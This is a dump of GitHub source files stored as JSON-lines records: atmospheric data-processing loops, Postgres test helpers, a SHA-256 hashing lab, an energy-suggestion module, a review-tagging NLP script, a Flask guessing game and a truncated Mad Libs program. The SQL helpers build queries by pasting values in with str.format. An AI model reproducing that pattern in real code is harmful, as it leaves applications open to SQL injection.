\nutbl_rf10.to_pickle('./perflight_output/utbl_rf10.pkl')\nmustar_rf10.to_pickle('./perflight_output/mustar_rf10.pkl')\ntau_rf10.to_pickle('./perflight_output/tau_rf10.pkl')\ngf_rf10.to_pickle('./perflight_output/gf_rf10.pkl')\nt_rf10.to_pickle('./perflight_output/t_rf10.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 11 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf11 = []\nmean_rf11 = []\nmode_rf11 = []\nnum = []\nbestk_rf11 = []\n\nutbl_rf11 = pd.DataFrame()\nmustar_rf11 = pd.DataFrame()\ngf_rf11 = pd.DataFrame()\nt_rf11 = pd.DataFrame()\ntau_rf11 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf11].columns: \n utbl_rf11[col] = ''\n mustar_rf11[col] = ''\n gf_rf11[col] = ''\n t_rf11[col] = ''\n tau_rf11[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf11]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = 
utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf11.append(best_k)\n r2_rf11.append(my_r2)\n mean_rf11.append(mean_age)\n mode_rf11.append(mode_age)\n # ----- save to dataframes\n utbl_rf11[col] = np.ndarray.flatten(my_utbl)\n mustar_rf11[col] = np.ndarray.flatten(my_mustar)\n tau_rf11[col] = np.ndarray.flatten(my_tau)\n gf_rf11[col] = np.ndarray.flatten(my_gf)\n t_rf11[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf11 = seg_info[seg_info['Flight'] == 'RF11']\n\nsegment_info_rf11['r squared'] = r2_rf11\nsegment_info_rf11['mean age'] = mean_rf11\nsegment_info_rf11['mode age'] = mode_rf11\nsegment_info_rf11['best k'] = bestk_rf11\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf11.pkl')\n\n# save others \nutbl_rf11.to_pickle('./perflight_output/utbl_rf11.pkl')\nmustar_rf11.to_pickle('./perflight_output/mustar_rf11.pkl')\ntau_rf11.to_pickle('./perflight_output/tau_rf11.pkl')\ngf_rf11.to_pickle('./perflight_output/gf_rf11.pkl')\nt_rf11.to_pickle('./perflight_output/t_rf11.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 12 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf12 = []\nmean_rf12 = []\nmode_rf12 = []\nnum = []\nbestk_rf12 = []\n\nutbl_rf12 = pd.DataFrame()\nmustar_rf12 = pd.DataFrame()\ngf_rf12 = pd.DataFrame()\nt_rf12 = pd.DataFrame()\ntau_rf12 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf12].columns: \n utbl_rf12[col] = ''\n mustar_rf12[col] = ''\n gf_rf12[col] = ''\n t_rf12[col] = ''\n tau_rf12[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf12]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = 
np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf12.append(best_k)\n r2_rf12.append(my_r2)\n mean_rf12.append(mean_age)\n mode_rf12.append(mode_age)\n # ----- save to dataframes\n utbl_rf12[col] = np.ndarray.flatten(my_utbl)\n mustar_rf12[col] = np.ndarray.flatten(my_mustar)\n tau_rf12[col] = np.ndarray.flatten(my_tau)\n gf_rf12[col] = np.ndarray.flatten(my_gf)\n t_rf12[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf12 = seg_info[seg_info['Flight'] == 'RF12']\n\nsegment_info_rf12['r squared'] = r2_rf12\nsegment_info_rf12['mean age'] = mean_rf12\nsegment_info_rf12['mode age'] = mode_rf12\nsegment_info_rf12['best k'] = bestk_rf12\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf12.pkl')\n\n# save others \nutbl_rf12.to_pickle('./perflight_output/utbl_rf12.pkl')\nmustar_rf12.to_pickle('./perflight_output/mustar_rf12.pkl')\ntau_rf12.to_pickle('./perflight_output/tau_rf12.pkl')\ngf_rf12.to_pickle('./perflight_output/gf_rf12.pkl')\nt_rf12.to_pickle('./perflight_output/t_rf12.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 13 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf13 = []\nmean_rf13 = []\nmode_rf13 = []\nnum = []\nbestk_rf13 = []\n\nutbl_rf13 = pd.DataFrame()\nmustar_rf13 = pd.DataFrame()\ngf_rf13 = pd.DataFrame()\nt_rf13 = pd.DataFrame()\ntau_rf13 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf13].columns: \n utbl_rf13[col] = ''\n mustar_rf13[col] = ''\n gf_rf13[col] = ''\n t_rf13[col] = ''\n tau_rf13[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf13]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf13.append(best_k)\n r2_rf13.append(my_r2)\n mean_rf13.append(mean_age)\n mode_rf13.append(mode_age)\n # ----- save to dataframes\n utbl_rf13[col] = np.ndarray.flatten(my_utbl)\n mustar_rf13[col] = np.ndarray.flatten(my_mustar)\n tau_rf13[col] = np.ndarray.flatten(my_tau)\n gf_rf13[col] = np.ndarray.flatten(my_gf)\n t_rf13[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf13 = seg_info[seg_info['Flight'] == 
'RF13']\n\nsegment_info_rf13['r squared'] = r2_rf13\nsegment_info_rf13['mean age'] = mean_rf13\nsegment_info_rf13['mode age'] = mode_rf13\nsegment_info_rf13['best k'] = bestk_rf13\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf13.pkl')\n\n# save others \nutbl_rf13.to_pickle('./perflight_output/utbl_rf13.pkl')\nmustar_rf13.to_pickle('./perflight_output/mustar_rf13.pkl')\ntau_rf13.to_pickle('./perflight_output/tau_rf13.pkl')\ngf_rf13.to_pickle('./perflight_output/gf_rf13.pkl')\nt_rf13.to_pickle('./perflight_output/t_rf13.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 14 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf14 = []\nmean_rf14 = []\nmode_rf14 = []\nnum = []\nbestk_rf14 = []\n\nutbl_rf14 = pd.DataFrame()\nmustar_rf14 = pd.DataFrame()\ngf_rf14 = pd.DataFrame()\nt_rf14 = pd.DataFrame()\ntau_rf14 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf14].columns: \n utbl_rf14[col] = ''\n mustar_rf14[col] = ''\n gf_rf14[col] = ''\n t_rf14[col] = ''\n tau_rf14[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf14]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf14.append(best_k)\n r2_rf14.append(my_r2)\n mean_rf14.append(mean_age)\n mode_rf14.append(mode_age)\n # ----- save to dataframes\n utbl_rf14[col] = np.ndarray.flatten(my_utbl)\n mustar_rf14[col] = np.ndarray.flatten(my_mustar)\n tau_rf14[col] = np.ndarray.flatten(my_tau)\n gf_rf14[col] = np.ndarray.flatten(my_gf)\n t_rf14[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf14 = seg_info[seg_info['Flight'] == 'RF14']\n\nsegment_info_rf14['r squared'] = r2_rf14\nsegment_info_rf14['mean age'] = mean_rf14\nsegment_info_rf14['mode age'] = mode_rf14\nsegment_info_rf14['best k'] = bestk_rf14\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf14.pkl')\n\n# save others 
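\n# hypothetical compaction (sketch only; run_flight_tts is an assumed name, not part of this script): the ten\n# per-flight blocks above are identical up to the flight id, so the same computation could be driven by one loop:\n#     for flight in ('RF05', 'RF06', 'RF07', 'RF08', 'RF09', 'RF10', 'RF11', 'RF12', 'RF13', 'RF14'):\n#         run_flight_tts(flight)  # wraps the per-column loop, the NaN padding, and the to_pickle calls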
\nutbl_rf14.to_pickle('./perflight_output/utbl_rf14.pkl')\nmustar_rf14.to_pickle('./perflight_output/mustar_rf14.pkl')\ntau_rf14.to_pickle('./perflight_output/tau_rf14.pkl')\ngf_rf14.to_pickle('./perflight_output/gf_rf14.pkl')\nt_rf14.to_pickle('./perflight_output/t_rf14.pkl')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"schelpon/TTS_2020_MD2","sub_path":"get_tts/tts_vary_ut/get_tts_vary_ut_segments_split.py","file_name":"get_tts_vary_ut_segments_split.py","file_ext":"py","file_size_in_byte":31479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20911702014","text":"def sql(cur, query):\n cur.execute(query)\n\n# Return a list of tuples\n# Example: [(1, 'abc'), (2, 'This is 2')]\n# Example: [(1,)]\ndef sql_select(cur, query):\n cur.execute(query)\n return cur.fetchall()\n\n## Helper functions\ndef insert_new_person(cursor, new_person):\n # Add the requester\n query = r\"\"\"\n SELECT\n insert_one_person('{}', '{}', '{}', '{}')\n ;\n \"\"\".format(new_person.username, new_person.password, new_person.email, new_person.created_dt)\n\n try:\n sql(cursor, query)\n except Exception as e:\n raise e\n\ndef insert_new_task(cursor, task_dummy):\n query = r\"\"\"\n SELECT\n insert_one_task('{}', '{}', {}, '{}', '{}', '{}', '{}', {})\n ;\n \"\"\".format( task_dummy.title, task_dummy.description, task_dummy.category_id, task_dummy.location,\n task_dummy.requester, task_dummy.start_dt, task_dummy.end_dt, task_dummy.price\n )\n try:\n sql(cursor, query)\n except Exception as e:\n raise e\n\ndef get_new_task_id(cursor, task_dummy):\n query = r\"\"\"\n SELECT id\n FROM task\n WHERE 1=1\n AND task.title = '{}'\n AND task.description = '{}'\n AND task.category_id = '{}'\n AND task.location = '{}'\n AND task.requester = '{}'\n AND task.start_dt = '{}'\n AND task.end_dt = '{}'\n AND task.price = '{}'\n AND task.status_task = 'open'\n AND task.assignee IS NULL\n ;\n \"\"\".format(task_dummy.title, task_dummy.description, task_dummy.category_id, task_dummy.location,\n task_dummy.requester, task_dummy.start_dt, task_dummy.end_dt, task_dummy.price)\n\n try:\n data = sql_select(cursor, query)\n return data[0][0]\n except Exception as e:\n raise e\n\ndef get_new_offer_id(cursor, task_id, offer_dummy):\n query = r\"\"\"\n SELECT offer.id\n FROM offer\n WHERE 1=1\n AND offer.task_id = {}\n AND offer.assignee = '{}'\n ;\n \"\"\".format(task_id, offer_dummy.assignee)\n\n try:\n data = sql_select(cursor, query)\n return data[0][0]\n except Exception as e:\n raise e\n","repo_name":"karrui/taskrr","sub_path":"test/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"19443397792","text":"import hashlib\nimport math\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\ndef one_wayness():\n #txt = input(\"Enter string to hash: \")\n #print(hashlib.sha256(txt.encode()).hexdigest())\n\n print(\"10 example hashes:\")\n for i in range(10):\n print(hashlib.sha256(os.urandom(256)).hexdigest())\n\n\n print(\"\\n2 hashes with hamming distance:\")\n print(hashlib.sha256(\"Example string 1\".encode()).hexdigest())\n print(hashlib.sha256(\"Example string 2\".encode()).hexdigest())\n print()\n\n\ndef preimage_res(target):\n print(\"Call for target: 0x{:064X}\" .format(target))\n\n i = 1\n while True:\n hash_val = int.from_bytes(hashlib.sha256(os.urandom(20)).digest(), 'big')\n if target > hash_val:\n break\n i += 1\n print(\"#Inputs: {}\\n 
targetVal: 0x{:064X}\\n digest: \\t0x{:064X}\\n\" .format(i, target, hash_val))\n return i\n\n\ndef collision_res():\n num_of_loops = 5\n\n bits_list = [list() for x in range(num_of_loops)]\n dict_list = [list() for x in range(num_of_loops)]\n time_list = [list() for x in range(num_of_loops)]\n\n dict_hashs = dict()\n\n for i in range(num_of_loops):\n print(\"test {}\".format(i))\n bits = 8\n while 50 >= bits:\n bits_list[i].append(bits)\n start_time = time.process_time()\n while True:\n value = os.urandom(20)\n # generate key and get only desired number of bytes\n key = int.from_bytes(hashlib.sha256(os.urandom(20)).digest()[0:(math.ceil(bits / 8))], 'big')\n # shift bytes so only 12 bits are left for comparison\n key = key >> ((math.ceil(bits / 8) * 8) - bits)\n # create dict\n if key in dict_hashs:\n if value != dict_hashs[key]:\n elapsed_time = (time.process_time() - start_time)\n time_list[i].append(elapsed_time)\n dict_list[i].append(len(dict_hashs) / 1000)\n print(\"Found duplicate with {} bits, needed {:.0f} s #inputs {}k\\nhash1: 0x{:020X}\\nInput1: 0x{:040X}\\nInput2: 0x{:040X}\\n\" .format(bits, elapsed_time, len(dict_hashs) / 1000, key, int.from_bytes(dict_hashs[key], 'big'), int.from_bytes(value, 'big')))\n break\n else:\n dict_hashs[key] = value\n dict_hashs.clear()\n bits += 2\n\n #calculate mean\n bits_mean_list = []\n dict_mean_list = []\n time_mean_list = []\n for i in range(len(bits_list[0])):\n bits_mean = 0\n dict_mean = 0\n time_mean = 0\n for j in range(num_of_loops):\n bits_mean += bits_list[j][i]\n dict_mean += dict_list[j][i]\n time_mean += time_list[j][i]\n bits_mean_list.append(bits_mean/float(num_of_loops))\n dict_mean_list.append(dict_mean/float(num_of_loops))\n time_mean_list.append(time_mean/float(num_of_loops))\n\n print(bits_mean_list)\n print(dict_mean_list)\n print(time_mean_list)\n\n #plotting graphs\n fig = plt.figure()\n for j in range(num_of_loops):\n plt.plot(bits_list[j], dict_list[j], ':')\n plt.plot(bits_mean_list, dict_mean_list, color='red')\n plt.xlabel('digest size [bits]')\n plt.ylabel('# of inputs [k]')\n fig.savefig('plot_num_input.png', dpi=500, bbox_inches='tight')\n fig.savefig('plot_num_input.svg', format='svg', dpi=500, bbox_inches='tight')\n\n fig1 = plt.figure()\n for j in range(num_of_loops):\n plt.plot(bits_list[j], time_list[j], ':')\n plt.plot(bits_mean_list, time_mean_list, color='red')\n plt.xlabel('digest size [bits]')\n plt.ylabel('collision time [s]')\n fig1.savefig('plot_time.png', dpi=500, bbox_inches='tight')\n fig1.savefig('plot_time.svg', format='svg', dpi=500, bbox_inches='tight')\n\n\nif __name__ == '__main__':\n one_wayness()\n\n t1 = 0x0FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t2 = 0x00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t3 = 0x000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t4 = 0x0000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t5 = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n preimage_res(t1)\n preimage_res(t2)\n preimage_res(t3)\n preimage_res(t4)\n preimage_res(t5)\n\n collision_res()\n","repo_name":"awilsee/CSec","sub_path":"Lab1/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74800784298","text":"from datetime import datetime\nfrom datetime import timedelta\nimport pandas as pd\n\n# Mocking out a db/storage scheme. 
We would ideally store these types of options per-user\nCONSUMERS = {\"electric_water_heater\": False, \"dishwasher\": True,\n             \"electric_vehicle\": True, \"washer_dryer\": True,\n             \"solar\": True}\nSOURCES = {\n    \"smart meter\": False,\n    \"home_energy_monitor\": False\n}\n\n\ndef readable_time(time):\n    time = pd.to_datetime(time)\n    return time.strftime(\"%I:%M %p\")\n\n\ndef get_max_renewable_time(caiso_dict):\n    df = pd.DataFrame(caiso_dict)\n    df['time'] = df.time.apply(lambda x: datetime.strptime(x, \"%H:%M:%S\"))\n    max_renewable = df[df['value'] > df.value.quantile(.75)].iloc[0]['time']\n    return max_renewable\n\n\ndef get_suggestions(caiso_dict):\n    suggestions = []\n    max_renewable_time = get_max_renewable_time(caiso_dict)\n    if CONSUMERS['electric_vehicle']:\n        t_end = pd.to_datetime(max_renewable_time) + timedelta(hours=3)\n        message = \"Set your electric car to charge between {} and {} tomorrow\".format(\n            readable_time(max_renewable_time), readable_time(t_end))\n        suggestions.append({\"time\": readable_time(max_renewable_time), \"message\": message})\n\n    if CONSUMERS['dishwasher']:\n        message = \"Load your dishwasher tonight and set it to run after {} tomorrow\".format(\n            readable_time(max_renewable_time))\n        suggestions.append({\"time\": readable_time(max_renewable_time), \"message\": message})\n\n    if CONSUMERS['washer_dryer']:\n        t = pd.to_datetime(max_renewable_time) + timedelta(hours=1)\n        message = \"Load your washer/dryer tonight and set it to run after {} tomorrow\".format(\n            readable_time(t))\n        suggestions.append({\"time\": readable_time(t), \"message\": message})\n\n    if CONSUMERS['solar']:\n        t = pd.to_datetime(max_renewable_time) + timedelta(hours=7.5)\n        t_end = pd.to_datetime(max_renewable_time) + timedelta(hours=10.5)\n        message = \"Pre-cool. Close drapes & windows. Program AC to run on max until {}. 
Then allow the temp to stay at 78 until {}\".format(\n readable_time(t), readable_time(t_end))\n suggestions.append({\"time\": readable_time(t), \"message\": message})\n\n return suggestions\n","repo_name":"Community-Energy-Labs/GridShiftHackathon2020_Repo","sub_path":"server/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41475904660","text":"# -*- coding: utf-8 -*-\nimport jieba\nimport spacy\n\nprint('load model\\n')\nnlp = spacy.load(\"zh_core_web_lg\")\n\nwith open('./stops.txt', 'r', encoding='utf8') as f:\n global stopwords\n stopwords = f.read().split('\\n')\n \nstopwords.append('\\n')\nstopwords.append('\\n\\n')\nstopwords.append('\\n\\n\\n')\nstopwords.append('⋯')\nstopwords.append('😆')\nstopwords.append('📍')\nstopwords.append('🌟')\n\nprint('create stop words\\n\\n')\nnlp.Defaults.stop_words |= set(stopwords)\n\nprint('stop words created\\n')\n\n# filt stopwords和 不相關的詞\ndef filtStopWords(documents):\n words = set()\n i = 0\n \n doc = jieba.cut(documents.replace(' ', ''))\n for token in doc: \n if str(token) not in nlp.Defaults.stop_words:\n words.add(str(token))\n \n return words\n\nprint('filter test:\\n\\n')\n\n# 做embedding並產生vectors\ndef word2vec(words):\n vectors = []\n for word in words:\n vectors.append(nlp(word).vector.tolist())\n return vectors\n\ndef word2vec2(words):\n return [nlp(word).vector.tolist() for word in words]\n\n\nimport pymongo\n\nremoteUrl = \"mongodb://localhost:57017\"\nlocalUrl = \"mongodb://localhost:27017\"\nmyclient = pymongo.MongoClient(remoteUrl)\nmydb = myclient[\"gp\"]\nmycol = mydb[\"map\"]\n\nprint('connect mongo\\n')\n\ni = 1\ntotalWords = 0\ncount = 0 \nwordsdel = []\nwordskept = []\nnlpScenery = nlp(\"景點\")\nnlpSea = nlp(\"海\")\nnlpMuseum = nlp(\"博物館\")\nnlpForest = nlp('森林')\nnlpTrails = nlp('步道')\nnlpPark = nlp('公園')\n\nnlpWords = [nlpSea, nlpMuseum, nlpForest, nlpTrails, nlpPark]\n\ncursor = mycol.find({}, no_cursor_timeout=True,batch_size=10)\nfor doc in cursor:\n\n i += 1\n if i % 1000 == 0:\n print('\\n\\n\\n\\n\\n\\n')\n print('-------------------------------------')\n print('\\n\\n\\\\n\\n\\n\\n')\n print(i)\n print('\\n\\n\\n\\n\\n\\n')\n print('-------------------------------------')\n print('\\n\\n\\\\n\\n\\n\\n')\n\n\n\n if 'food' not in doc[\"types\"] or 'restaurant' not in doc['types']:\n words = filtStopWords(doc['reviews'])\n\n # test each word in words' similarity \n\n phraseskept = []\n\n for word in words:\n totalWords += 1\n nlpWord = nlp(word)\n\n keepWord = False\n # print(word,end=' ')\n for testWord in nlpWords:\n similarityScore = nlpWord.similarity(testWord)\n if similarityScore > 0.35:\n keepWord = True\n # print(round(similarityScore,3),end=' ')\n # print()\n\n if nlpWord.similarity(nlpScenery) >= 0.3 or keepWord: # and nlpWord.similarity(nlpLandscape)\n phraseskept.append(word)\n wordskept.append(word)\n count += 1\n\n print(doc['name'])\n print(doc['types'])\n print(phraseskept)\n print('\\n')\n\n vectors = word2vec(phraseskept)\n query = {\"place_id\": doc['place_id']}\n newvalues = {\"$set\": {\"reviews_spacy\": vectors,\n \"tags\": phraseskept}}\n mycol.update_one(query, newvalues)\n\n\n \n \n\n\ncursor.close()\nmyclient.close()\nprint(wordskept)\n\n'''\n\nprint(count)\nprint(totalWords)\n\nnlpWords.append(nlpScenery)\n\nfor word in wordskept:\n print(word)\n for testWord in nlpWords:\n print(round(nlp(word).similarity(testWord),3), end=' ')\n print()\n\n''' \n\n\n\n 
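# minimal restatement of the tag-keeping rule applied in the main loop (thresholds copied from it; assumes the\n# module-level spaCy model nlp is already loaded):\ndef keep_word(word):\n    tok = nlp(word)\n    anchors = [nlp(w) for w in ('海', '博物館', '森林', '步道', '公園')]\n    return tok.similarity(nlp('景點')) >= 0.3 or any(tok.similarity(a) > 0.35 for a in anchors)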
\n","repo_name":"NCCUCSGraduateProject/Graduate_Project","sub_path":"word2vec/scenery.py","file_name":"scenery.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"16445844790","text":"from flask import Flask\nimport random\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef Game():\n return \"<h1> Guess a number between 0 and 9 </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/3o7aCSPqXE5C6T8tBC/giphy.gif' width=400, height=400>\"\n\ncomputer_select = random.randint(0,9)\n\n@app.route(\"/<int:num>\")\ndef guess(num):\n if(computer_select == num):\n return \"<h1> You found me! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/4T7e4DmcrP9du/giphy.gif' width=400, height=400>\"\n if (computer_select > num):\n return \"<h1> Too low, try again! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/jD4DwBtqPXRXa/giphy.gif' width=400, height=400>\"\n if (computer_select < num):\n return \"<h1> Too high, try again! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/3o6ZtaO9BZHcOjmErm/giphy.gif' width=400, height=400>\"\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Suman-Adhikary/flask","sub_path":"Higher-Lower.py","file_name":"Higher-Lower.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21527300356","text":"from pynput import keyboard\nimport os\nfrom Play import Play\nfrom Fonts import bcolors\n\nclass Create:\n def __init__(self):\n self.MasterListName = os.path.abspath(os.path.join(os.getcwd(), \"..\", \"MadLibs\", \"MasterList.txt\"))\n self.temp = 1\n self.title = \"\"\n self.mad_lib = \"\"\n self.done_input = False\n self.done_confirmed = False\n\n def start(self):\n print(\"Here, you can create your own Mad Lib!\")\n print(\"Create your story while prompting for\")\n print(\"some input from a player. To prompt a\")\n print(\"User for input, place your prompt between\")\n print(\"two asterisks(*). For example: *verb* and\")\n print(\"continue one with your story! To finish,\")\n print(\"press the Enter key, the Escape key, and \")\n print(\" then the Enter key again. \")\n print(\" Happy Libbing! \")\n self.get_title()\n self.start_keyboard_listener()\n should_continue = self.get_mad_lib_input()\n if should_continue:\n self.ask_play_made()\n\n def on_release(self, key):\n if key == keyboard.Key.esc:\n self.done_input = True\n\n def get_title(self):\n print(\"\\nPlease enter the title of your Mad Lib!\")\n self.title = input()\n\n def get_mad_lib_input(self):\n print(\"Please enter the Mad Lib!\")\n while not self.done_confirmed:\n while not self.done_input:\n new_input = input()\n self.mad_lib += new_input\n\n done = self.confirm_done()\n if not done:\n self.done_input = False\n else:\n self.done_confirmed = True\n check_successful = self.check_input()\n if check_successful:\n self.save_madlib()\n return True\n return False\n\n def check_input(self):\n asterisk_count = 0\n for character in self.mad_lib:\n if character == '*':\n asterisk_count += 1\n\n if asterisk_count % 2 != 0:\n print(f\"{bcolors.FAIL}Error: There was an uneven number of asterisks given in the input\")\n print(f\"{bcolors.WHITE}\")\n return False\n\n return True\n\n def save_madlib(self):\n title_valid = False\n while not title_valid:\n self.title = self.title.replace(' ', '')\n if self.title == \"\":\n print(f\"{bcolors.FAIL}Error: Madlib name is invalid. 
